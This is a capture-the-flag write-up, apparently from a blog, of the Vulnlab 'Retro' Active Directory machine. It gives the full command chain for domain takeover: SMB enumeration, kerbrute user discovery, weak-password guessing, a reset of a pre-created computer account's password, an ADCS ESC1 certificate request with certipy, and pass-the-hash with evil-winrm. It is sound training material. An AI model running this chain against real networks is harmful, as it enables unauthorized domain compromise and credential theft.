Vulnlab Retro

Vulnlab Retro Writeup

Overview

Retro is an easy-difficulty machine created by r0BIT, starting by enumerating SMB shares and finding notes about pre-created computer accounts to exploit the ADCS ESC1 template

Nmap Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
nmap -sCV -Pn 10.10.74.226               [10:23:56]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 10:24 EST
Nmap scan report for 10.10.74.226
Host is up (0.22s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-19 15:26:28Z)
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-11-19T15:16:42
|_Not valid after:  2025-11-19T15:16:42
|_ssl-date: TLS randomness does not represent time
464/tcp  open  kpasswd5?
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-11-19T15:16:42
|_Not valid after:  2025-11-19T15:16:42
3269/tcp open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-11-19T15:16:42
|_Not valid after:  2025-11-19T15:16:42
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumerating Shares

Let’s try to enumerate the shares, if they allow anonymous login

1
smbclient -L //10.10.74.226

Figure 1

From the screenshot above, we can see that we have two non default shares, Notes and Trainees

Let’s try to connect to the Trainees share, still with anonymous login

1
smbclient -U "anonymous" \\\\10.10.74.226\\Trainees

We can see a file Important.txt let’s download it and review it

Figure 2

1
cat Important.txt

Figure 3

We have new informations, the trainees doesn’t use strong and unique password and they bundle everyone into a single account

If we try to enumerate the Notes share, we can connect to the share but we cannot list the content

1
smbclient -U "anonymous" \\\\10.10.74.226\\Notes

Figure 4

Finding Valid Users With Kerbrute

Let’s enumerate some accounts with kerbrute, but first let’s add retro.vl and DC.retro.vl to our host file, look again at the Nmap scan for the DNS to get this information 

1
sudo vim /etc/hosts

Figure 5

Now we can run Kerbrute 

1
kerbrute userenum -d retro.vl --dc 10.10.74.226 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt

Figure 6

We found new non default users!

Now do you remember Important.txt? It was saying that all the trainees are bundled into one account, we now have the account name trainee@retro.vl

Enumerate Shares from Trainee’s Account

We know that the trainees cannot remember a strong password, so we can assume that they are using a weak password

We can try some password guessing, let’s see if they also use trainee as their password using Netexec 

1
netexec smb 10.10.74.226 -u trainee -p trainee

Figure 7

Bingo! We found the password for the user trainee, now let’s see if we have more privileges and enumerate the Notes share that we couldn’t enumerate earlier by using the credentials trainee / trainee

1
smbclient -U "trainee" \\\\10.10.74.226\\Notes

Figure 8

We could list the share and found a new file ToDo.txt that we can download

Let’s see now the content of the file

Figure 9

We have new informations, first we can assume that Thomas is the user found with Kerbrute tblack@retro.vl

We can also see that they use a very old pre created computer account

Exploiting the Pre Created Computer Account

A quick Google search pre created computer account will lead you to the first link from TrustedSec https://trustedsec.com/blog/diving-into-pre-created-computer-accounts

Let’s follow this article, I highly reccomend you to read it so you will have a good understanding of what we are doing

First let’s enumerate for computer account using ldapsearch 

1
ldapsearch -x -H ldap://10.10.74.226 -D "trainee@RETRO.vl" -w "trainee" -b "CN=Computers,DC=RETRO,DC=vl" "(objectClass=computer)" sAMAccountName

Figure 10

We found the computer account: BANKING$

We can change the password by modifying krb5.conf

1
sudo apt-get install krb5-user
1
sudo vim /etc/krb5.conf

Your krb5.conf file should look like the following exactly 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[libdefaults]
	default_realm = RETRO.VL
	dns_lookup_realm = false
	ticket_lifetime = 24h
	renew_lifetime = 7d
	rdns = false
	kdc_timesync = 1
	ccache_type = 4 
	forwardable = true
	proxiable = true

[realms]
	RETRO.VL = {
	     kdc = DC.RETRO.VL
	     admin_server = DC.RETRO.VL
	}

Figure 11

Alright now let’s try to change the password for BANKING$ it will ask for the current password, type banking

We will change it for Password123

1
kpasswd BANKING$

Figure 12

Let’s check if it successfully changed using Netexec 

1
netexec smb 10.10.74.226 -u banking$ -p Password123

Figure 13

ADCS Attack

Let’s use Certipy, to see if we can abuse ADCS 

1
certipy-ad find -u 'banking$@retro.vl' -p Password123 -dc-ip 10.10.74.226 -vulnerable -enabled

Figure 14

We can see it saved the result in multiple format, you can use it with BloodHound. We are not gonna use BloodHound Today, we will stick with the JSON file

Let’s see if a template is misconfigured and we can attack (note that the name of the file will be different for you)

1
cat 20241119114211_Certipy.json | grep "ESC*"

Figure 15

We may be able to attack the template because the template RetroClients is misconfigured, allowing machine accounts to enroll on behalf of other users

Now let’s cat again 20241119114211_Certipy.json because we need the template name and the certificate authoritie name

1
cat 20241119114211_Certipy.json

Figure 16

Now let’s abuse it to get the Administrator certificate

1
certipy-ad req -u 'banking$@retro.vl' -p Password123 -dc-ip 10.10.74.226 -target DC.retro.vl -ca 'retro-DC-CA' -template 'RetroClients' -upn 'administrator@retro.vl'

Figure 17

As you can see that’s not working, watch the error it says that the problem is the key length

Let’s see again the JSON file 

1
cat 20241119114211_Certipy.json

Figure 18

We can see the minimum key lenght is 4096, but from the Certipy GitHub repo, we can see the default lenght is 2048.

Let’s run Certipy again and providing the right key size 

1
certipy-ad req -u 'banking$@retro.vl' -p Password123 -dc-ip 10.10.74.226 -target DC.retro.vl -ca 'retro-DC-CA' -template 'RetroClients' -upn 'administrator@retro.vl' -key-size 4096

Figure 19

We now have a different error, this is because we have to sync our virtual machine to the DC, we can do so by using Ntpdate

1
sudo ntpdate retro.vl

Figure 20

Now run the certipy command again, and you can see we have the administrator.pfx downloaded to our machine

Let’s retrieve the NTLM hash, so we can perform a Pass The Hash attack

1
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.74.226

Figure 21

Great! I did a nmap all ports scan and found that WinRM is open (port 5985) Let’s try EvilWinRM for the Pass The Hash 

1
evil-winrm -i 10.10.74.226 -u administrator -H 252fac7066d93dd009d4fd2cd0368389

Figure 22

And we are Administrator!

writeups > Vulnlab
Vulnlab Retro
https://spidersec.io/writeups/Vulnlab/Vulnlab Retro/
Author
5p1d4r
Posted on
November 19, 2024
Licensed under